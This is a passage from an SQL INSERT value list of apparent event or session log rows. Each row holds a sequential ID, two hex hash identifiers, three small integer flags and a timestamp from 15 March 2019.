(70194, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 17:39:06'),
(70195, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 17:39:27'),
(70196, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-15 17:39:42'),
(70197, '28d30aba117b99bcb8481d740938180f', 'c9f9bf7e23859bf9', 0, 2, 1, '2019-03-15 17:39:49'),
(70198, '28d30aba117b99bcb8481d740938180f', 'c9f9bf7e23859bf9', 0, 2, 1, '2019-03-15 17:40:02'),
(70199, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-15 17:40:14'),
(70200, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 17:40:27'),
(70201, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 17:40:40'),
(70202, '1342f272be51f4194bc63bda4b2a5df4', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 17:44:34'),
(70203, '1159726124ac79a192efa55d945f81f7', 'da0989130d1f218b', 0, 2, 1, '2019-03-15 17:44:35'),
(70204, '16ef8293e980da62ac6b7b0cf924166f', '7ffba4677245886f', 0, 2, 1, '2019-03-15 17:45:48'),
(70205, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 17:45:59'),
(70206, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 17:47:59'),
(70207, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 17:48:24'),
(70208, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 17:49:00'),
(70209, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 17:49:41'),
(70210, '6ce8b3db2e16a75c28676660ee440eaa', '27d3b62cdd82d36e', 0, 2, 1, '2019-03-15 17:50:01'),
(70211, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 17:50:13'),
(70212, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-15 17:50:32'),
(70213, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 17:52:19'),
(70214, '16ef8293e980da62ac6b7b0cf924166f', '7ffba4677245886f', 0, 2, 1, '2019-03-15 17:52:48'),
(70215, 'dda1d15fc8b8a2468c1c6404008cd8cf', 'f69214bd1249660d', 0, 2, 1, '2019-03-15 17:53:47'),
(70216, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 17:55:04'),
(70217, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 17:55:21'),
(70218, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-15 17:57:35'),
(70219, 'dbd54c127dfe4a356bb7cd1a33033340', '417b807dff7c6249', 0, 2, 1, '2019-03-15 18:02:11'),
(70220, 'a60669b013414a87d900ed1f549ca0dc', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-15 18:03:14'),
(70221, 'bff599d05cd90d4cdd82d2e2bad19430', '865405165d55aaca', 0, 2, 1, '2019-03-15 18:03:43'),
(70222, '02355bee52f4db07958145e53303ee01', '3cb4559b067b1d80', 0, 2, 1, '2019-03-15 18:04:03'),
(70223, 'dda1d15fc8b8a2468c1c6404008cd8cf', 'f69214bd1249660d', 0, 2, 1, '2019-03-15 18:04:06'),
(70224, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 18:05:03'),
(70225, 'bff599d05cd90d4cdd82d2e2bad19430', '865405165d55aaca', 0, 2, 1, '2019-03-15 18:05:34'),
(70226, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 18:07:26'),
(70227, '74de8b9bb72b75d74280e58c9df9ccde', 'b97b25b59a392301', 0, 2, 1, '2019-03-15 18:07:26'),
(70228, 'bff599d05cd90d4cdd82d2e2bad19430', '865405165d55aaca', 0, 2, 1, '2019-03-15 18:07:56'),
(70229, '29fdc7f7eff0378982eecc299d6f59a8', '1791b1aeb2327e22', 0, 2, 1, '2019-03-15 18:08:29'),
(70230, '29fdc7f7eff0378982eecc299d6f59a8', '1791b1aeb2327e22', 0, 2, 1, '2019-03-15 18:08:44'),
(70231, 'bff599d05cd90d4cdd82d2e2bad19430', '865405165d55aaca', 0, 2, 1, '2019-03-15 18:09:13'),
(70232, '29fdc7f7eff0378982eecc299d6f59a8', '1791b1aeb2327e22', 0, 2, 1, '2019-03-15 18:10:16'),
(70233, '065a5816df7fdcb639d49d322a2967b6', '854dd24b6beb7284', 0, 2, 1, '2019-03-15 18:11:30'),
(70234, 'bff599d05cd90d4cdd82d2e2bad19430', '865405165d55aaca', 0, 2, 1, '2019-03-15 18:13:59'),
(70235, 'ead63549ee0fc078050f77db4b5d4228', 'd982869195a81c84', 0, 2, 1, '2019-03-15 18:14:23'),
(70236, 'dda1d15fc8b8a2468c1c6404008cd8cf', 'f69214bd1249660d', 0, 2, 1, '2019-03-15 18:14:23'),
(70237, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-15 18:14:42'),
(70238, '02355bee52f4db07958145e53303ee01', '3cb4559b067b1d80', 0, 2, 1, '2019-03-15 18:16:52'),
(70239, 'bff599d05cd90d4cdd82d2e2bad19430', '865405165d55aaca', 0, 2, 1, '2019-03-15 18:17:05'),
(70240, 'bff599d05cd90d4cdd82d2e2bad19430', '865405165d55aaca', 0, 2, 1, '2019-03-15 18:17:23'),
(70241, 'e640da9e3b7b44a0b950c5a710abfb6a', '8bfc9ce1514a40dc', 0, 2, 1, '2019-03-15 18:18:19'),
(70242, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-15 18:19:03'),
(70243, 'adc302d509e79924c9555c65b53874ce', '7501b42c35accff7', 0, 2, 1, '2019-03-15 18:19:11'),
(70244, '9d73fe5f41acfab7c5a53bb12b7647ed', '8f11fc51d6997c2d', 0, 2, 1, '2019-03-15 18:20:11'),
(70245, 'dda1d15fc8b8a2468c1c6404008cd8cf', 'f69214bd1249660d', 0, 2, 1, '2019-03-15 18:21:26'),
(70246, '272ba5ccfb98de515991b8ded5b73e1d', '00cfdd65313a346b', 0, 2, 1, '2019-03-15 18:22:49'),
(70247, '0238ab4eb473e448df68d5b3c74ed080', 'edfe950d47379572', 0, 2, 1, '2019-03-15 18:23:09'),
(70248, '1159726124ac79a192efa55d945f81f7', 'da0989130d1f218b', 0, 2, 1, '2019-03-15 18:25:51'),
(70249, 'e640da9e3b7b44a0b950c5a710abfb6a', '8bfc9ce1514a40dc', 0, 2, 1, '2019-03-15 18:26:21'),
(70250, 'dda1d15fc8b8a2468c1c6404008cd8cf', 'f69214bd1249660d', 0, 2, 1, '2019-03-15 18:27:55'),
(70251, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-15 18:29:39'),
(70252, 'd2a904e022bee257769f4a5e10d9ec52', '2378ec7ca8500d62', 0, 2, 1, '2019-03-15 18:29:40'),
(70253, '421548a0b9d8b50e90509115d4d0a3a1', '44451e386b316e7c', 0, 2, 1, '2019-03-15 18:31:30'),
(70254, 'eba7b52128b1a2984a48cb56fd211bd5', 'd7036fef56eff751', 0, 2, 1, '2019-03-15 18:33:20'),
(70255, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 18:34:24'),
(70256, 'ec4889a15856c237ef008b280d7ba39b', '17ffb4418cd4452b', 0, 2, 1, '2019-03-15 18:34:24'),
(70257, 'fb41bc1ef5016ffdd46a18b1690bace6', '6f44d4b615e5cf3f', 0, 2, 1, '2019-03-15 18:36:14'),
(70258, 'f79ac247f18d9f7666befdb55aea978b', '402692e46d0378b1', 0, 2, 1, '2019-03-15 18:41:11'),
(70259, 'ec97b972be18d291902ce1b0cd807ec0', '2ea7201b0e939b00', 0, 2, 1, '2019-03-15 18:42:26'),
(70260, '2636a4b106c761cfb745c604770ada52', 'cdd061c9b9222d3e', 0, 2, 1, '2019-03-15 18:46:31'),
(70261, '2636a4b106c761cfb745c604770ada52', 'cdd061c9b9222d3e', 0, 2, 1, '2019-03-15 18:48:33'),
(70262, 'b95b9820ce3952222f2940caea1d7c3a', '624d6937076d1188', 0, 2, 1, '2019-03-15 18:50:16'),
(70263, 'ec4889a15856c237ef008b280d7ba39b', '17ffb4418cd4452b', 0, 2, 1, '2019-03-15 18:51:08'),
(70264, '3a5e253ea26bd72f4ae67b5097206274', '37dedc117a94d375', 0, 2, 1, '2019-03-15 18:51:20'),
(70265, 'a0bd4bdd046ab1d6a6f4a641d33289b7', 'ec18b138536ee06e', 0, 2, 1, '2019-03-15 18:57:26'),
(70266, '545888272ba5bdbcaffd10817b537af3', 'f1fc193e42194328', 0, 2, 1, '2019-03-15 18:58:05'),
(70267, '545888272ba5bdbcaffd10817b537af3', 'f1fc193e42194328', 0, 2, 1, '2019-03-15 18:59:08'),
(70268, '545888272ba5bdbcaffd10817b537af3', 'f1fc193e42194328', 0, 2, 1, '2019-03-15 18:59:40'),
(70269, 'a90a93e59a5fcaa56c38ccd76b8ec5b9', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 18:59:44'),
(70270, 'a90a93e59a5fcaa56c38ccd76b8ec5b9', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 18:59:58'),
(70271, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 19:00:02'),
(70272, 'a90a93e59a5fcaa56c38ccd76b8ec5b9', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 19:00:07'),
(70273, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:00:10'),
(70274, '0039e85fc069280a7cebb9edb8f2f9b9', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-15 19:00:19'),
(70275, 'a90a93e59a5fcaa56c38ccd76b8ec5b9', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 19:00:24'),
(70276, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:00:30'),
(70277, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 19:00:34'),
(70278, 'a90a93e59a5fcaa56c38ccd76b8ec5b9', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 19:00:37'),
(70279, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:00:38'),
(70280, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 19:00:49'),
(70281, 'b2d021d316cb42a735aef42bad2ffa98', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 19:00:49'),
(70282, '16ef8293e980da62ac6b7b0cf924166f', '7ffba4677245886f', 0, 2, 1, '2019-03-15 19:00:50'),
(70283, '16ef8293e980da62ac6b7b0cf924166f', '7ffba4677245886f', 0, 2, 1, '2019-03-15 19:01:21'),
(70284, 'b2d021d316cb42a735aef42bad2ffa98', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 19:01:23'),
(70285, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:01:28'),
(70286, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:01:36'),
(70287, 'e640da9e3b7b44a0b950c5a710abfb6a', '8bfc9ce1514a40dc', 0, 2, 1, '2019-03-15 19:01:41'),
(70288, 'e640da9e3b7b44a0b950c5a710abfb6a', '8bfc9ce1514a40dc', 0, 2, 1, '2019-03-15 19:02:22'),
(70289, 'a0bd4bdd046ab1d6a6f4a641d33289b7', 'ec18b138536ee06e', 0, 2, 1, '2019-03-15 19:02:40'),
(70290, '926eb632d07267d06b3423be22eb6491', '8ba4cc26b18f2711', 0, 2, 1, '2019-03-15 19:02:45'),
(70291, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:02:52'),
(70292, 'a0bd4bdd046ab1d6a6f4a641d33289b7', 'ec18b138536ee06e', 0, 2, 1, '2019-03-15 19:02:57'),
(70293, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:03:02'),
(70294, 'ac13350bea5ec5f840541c3541019f84', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 19:03:03'),
(70295, 'ac13350bea5ec5f840541c3541019f84', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 19:03:22'),
(70296, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-15 19:03:33'),
(70297, 'cee4368954fe4314db21d474f6ce11da', 'b75bf757601d31d5', 0, 2, 1, '2019-03-15 19:03:39'),
(70298, 'a90a93e59a5fcaa56c38ccd76b8ec5b9', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 19:03:57'),
(70299, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 19:04:03'),
(70300, 'ac13350bea5ec5f840541c3541019f84', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 19:04:12'),
(70301, 'a90a93e59a5fcaa56c38ccd76b8ec5b9', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 19:04:15'),
(70302, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-15 19:04:19'),
(70303, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:04:20'),
(70304, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-15 19:04:39'),
(70305, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:06:03'),
(70306, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 19:06:06'),
(70307, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:06:11'),
(70308, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 19:06:34'),
(70309, 'e640da9e3b7b44a0b950c5a710abfb6a', '8bfc9ce1514a40dc', 0, 2, 1, '2019-03-15 19:06:34'),
(70310, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:06:54'),
(70311, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:07:07'),
(70312, 'b2d021d316cb42a735aef42bad2ffa98', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 19:07:23'),
(70313, 'c76cfc0858520b3c9a9044aeb3ab4c0c', '1e8786f2f88c192b', 0, 2, 1, '2019-03-15 19:07:52'),
(70314, '16ef8293e980da62ac6b7b0cf924166f', '7ffba4677245886f', 0, 2, 1, '2019-03-15 19:07:59'),
(70315, 'f5f9c7b494848b738fd021a2b1969d32', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 19:08:59'),
(70316, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 19:10:16'),
(70317, '29fdc7f7eff0378982eecc299d6f59a8', '1791b1aeb2327e22', 0, 2, 1, '2019-03-15 19:11:22'),
(70318, '834916321206a5a494ffc62c35f1f4d6', 'c1fca6d49383a74a', 0, 2, 1, '2019-03-15 19:11:51'),
(70319, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-15 19:11:52'),
(70320, '0436e1263b84606c13365f3ae48e6d83', 'c9b8d315d813f091', 0, 2, 1, '2019-03-15 19:11:56'),
(70321, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:11:58'),
(70322, '0436e1263b84606c13365f3ae48e6d83', 'c9b8d315d813f091', 0, 2, 1, '2019-03-15 19:12:08'),
(70323, 'b7f671fb0c09d51d565ade536f8e58b6', 'd86d441339858efd', 0, 2, 1, '2019-03-15 19:12:31'),
(70324, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:12:34'),
(70325, 'b6bc1f266f84079e946c11b152c197d4', '91d3688e197526d0', 0, 2, 1, '2019-03-15 19:12:48'),
(70326, '0039e85fc069280a7cebb9edb8f2f9b9', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-15 19:12:51'),
(70327, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:13:03'),
(70328, '29fdc7f7eff0378982eecc299d6f59a8', '1791b1aeb2327e22', 0, 2, 1, '2019-03-15 19:13:26'),
(70329, '30f42239c44e2bfe1eea193fb41ff9d4', '5a463e6e9f5a3215', 0, 2, 1, '2019-03-15 19:13:56'),
(70330, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-15 19:15:14'),
(70331, '0039e85fc069280a7cebb9edb8f2f9b9', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-15 19:15:18'),
(70332, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:15:37'),
(70333, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 19:17:26'),
(70334, 'e640da9e3b7b44a0b950c5a710abfb6a', '8bfc9ce1514a40dc', 0, 2, 1, '2019-03-15 19:18:35'),
(70335, '7846756c8b00b0b552c15ca6e92a8c66', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-15 19:19:25'),
(70336, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:20:40'),
(70337, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:20:56'),
(70338, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:21:31'),
(70339, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 19:21:38'),
(70340, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-15 19:22:25'),
(70341, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-15 19:22:35'),
(70342, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-15 19:22:45'),
(70343, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:23:53'),
(70344, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 19:24:07'),
(70345, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:25:32'),
(70346, 'e5e52d46bfe525ae8b83710ec39764d6', '8caa0f8acd2310e9', 0, 2, 1, '2019-03-15 19:27:58'),
(70347, '0039e85fc069280a7cebb9edb8f2f9b9', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-15 19:28:29'),
(70348, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:28:34'),
(70349, '1c2f3c8a90514ffcd16ba4b0ceafa1bf', 'c82195f7827b9487', 0, 2, 1, '2019-03-15 19:29:19'),
(70350, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:30:41'),
(70351, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:30:58'),
(70352, '7846756c8b00b0b552c15ca6e92a8c66', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-15 19:31:08'),
(70353, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:32:29'),
(70354, '065a5816df7fdcb639d49d322a2967b6', '854dd24b6beb7284', 0, 2, 1, '2019-03-15 19:32:32'),
(70355, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 19:33:27'),
(70356, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:38:14'),
(70357, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 19:41:45'),
(70358, 'ec97b972be18d291902ce1b0cd807ec0', '2ea7201b0e939b00', 0, 2, 1, '2019-03-15 19:42:36'),
(70359, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:42:44'),
(70360, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:43:19'),
(70361, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:43:56'),
(70362, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:44:19'),
(70363, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:44:33'),
(70364, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:44:51'),
(70365, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:45:03'),
(70366, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 19:45:52'),
(70367, '9d5a7afa18d223a8a4de268cd32c1bef', '4574603cf07e6399', 0, 2, 1, '2019-03-15 19:46:13'),
(70368, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 19:46:35'),
(70369, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 19:47:05'),
(70370, '4c112f9682c2a81973e188cafb4be6f7', '1050858b5c90cf2f', 0, 2, 1, '2019-03-15 19:47:17'),
(70371, '4c112f9682c2a81973e188cafb4be6f7', '1050858b5c90cf2f', 0, 2, 1, '2019-03-15 19:47:29'),
(70372, 'ec97b972be18d291902ce1b0cd807ec0', '2ea7201b0e939b00', 0, 2, 1, '2019-03-15 19:48:02'),
(70373, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 19:48:03'),
(70374, 'a60669b013414a87d900ed1f549ca0dc', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-15 19:48:58'),
(70375, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:49:05'),
(70376, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:49:49'),
(70377, '29fdc7f7eff0378982eecc299d6f59a8', '1791b1aeb2327e22', 0, 2, 1, '2019-03-15 19:50:44'),
(70378, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:50:47'),
(70379, 'c17f3b021b730499505f50eba6bdefbf', 'e50451d6d332bac5', 0, 2, 1, '2019-03-15 19:53:33'),
(70380, 'b7744d4beff06619fea4b566a3342b85', '8e9a16956483f85e', 0, 2, 1, '2019-03-15 19:53:55'),
(70381, '404c8f1442ecd0d51f7e20b89667b985', '108aedc613084c5c', 0, 2, 1, '2019-03-15 19:54:06'),
(70382, '240190b7d07bd30d747f79b32bb8a16b', 'e996039688368fa6', 0, 2, 1, '2019-03-15 19:55:26'),
(70383, '7846756c8b00b0b552c15ca6e92a8c66', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-15 19:56:23'),
(70384, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 19:57:48'),
(70385, '240190b7d07bd30d747f79b32bb8a16b', 'e996039688368fa6', 0, 2, 1, '2019-03-15 19:58:03'),
(70386, 'f76c062a443c080231b6ce9a16daf29e', '84c73015e9e28e8a', 0, 2, 1, '2019-03-15 19:59:40'),
(70387, '5a1b02b4779e4b4fa0288da0f5d8ef8c', 'e5ecd636c4d9a54c', 0, 2, 1, '2019-03-15 19:59:57'),
(70388, 'f76c062a443c080231b6ce9a16daf29e', '84c73015e9e28e8a', 0, 2, 1, '2019-03-15 20:00:20'),
(70389, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 20:02:08'),
(70390, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 20:02:23'),
(70391, '4e403e7779e573d3856f3eaeed3bd016', '7ad504ff8801f3a7', 0, 2, 1, '2019-03-15 20:02:47'),
(70392, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 20:03:23'),
(70393, 'f1eedaac6548b2dafb514b75008a1bd4', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-15 20:04:10'),
(70394, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-15 20:04:42'),
(70395, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 20:05:31'),
(70396, 'f0387ab7a62e20ecbcefd4839b0dd16d', 'd264afaaa92ba88d', 0, 2, 1, '2019-03-15 20:07:55'),
(70397, 'fd9e5315366985a59fb9a23a49d25bc8', '5b6f49ae403da8d8', 0, 2, 1, '2019-03-15 20:08:03'),
(70398, 'fd9e5315366985a59fb9a23a49d25bc8', '5b6f49ae403da8d8', 0, 2, 1, '2019-03-15 20:08:08'),
(70399, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 20:08:25'),
(70400, 'd2a904e022bee257769f4a5e10d9ec52', '2378ec7ca8500d62', 0, 2, 1, '2019-03-15 20:09:34'),
(70401, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 20:12:20'),
(70402, 'cee4368954fe4314db21d474f6ce11da', 'b75bf757601d31d5', 0, 2, 1, '2019-03-15 20:16:04'),
(70403, '278db219a2f0ef613f83defe129b3148', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 20:16:38'),
(70404, '03cb8d8270c7684ea755383158215308', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 20:17:02'),
(70405, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 20:17:42'),
(70406, '278db219a2f0ef613f83defe129b3148', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 20:18:35'),
(70407, '676354e3a864bc0807efae4aa43315e2', 'da0989130d1f218b', 0, 2, 1, '2019-03-15 20:18:35'),
(70408, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 20:19:52'),
(70409, '7daff181ad057de0d9651dccdd775e9d', '0530018377078939', 0, 2, 1, '2019-03-15 20:20:09'),
(70410, '0039e85fc069280a7cebb9edb8f2f9b9', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-15 20:22:18'),
(70411, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 20:22:23'),
(70412, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 20:22:39'),
(70413, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 20:22:39'),
(70414, '1d47499d0a3a67c172bfb6fdb49cde09', '22f43a16a511f701', 0, 2, 1, '2019-03-15 20:22:57'),
(70415, '3784c2abc0147d6141c986d8c3378442', 'd86d441339858efd', 0, 2, 1, '2019-03-15 20:23:24'),
(70416, 'be836cf0886c36521ef6dfe58bfd36ce', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 20:23:33'),
(70417, 'cee4368954fe4314db21d474f6ce11da', 'b75bf757601d31d5', 0, 2, 1, '2019-03-15 20:24:04'),
(70418, '90f6fbf5c5219af7ed99cf61591dc9ec', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 20:24:16'),
(70419, 'b6bc1f266f84079e946c11b152c197d4', '91d3688e197526d0', 0, 2, 1, '2019-03-15 20:24:43'),
(70420, '90f6fbf5c5219af7ed99cf61591dc9ec', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-15 20:25:09'),
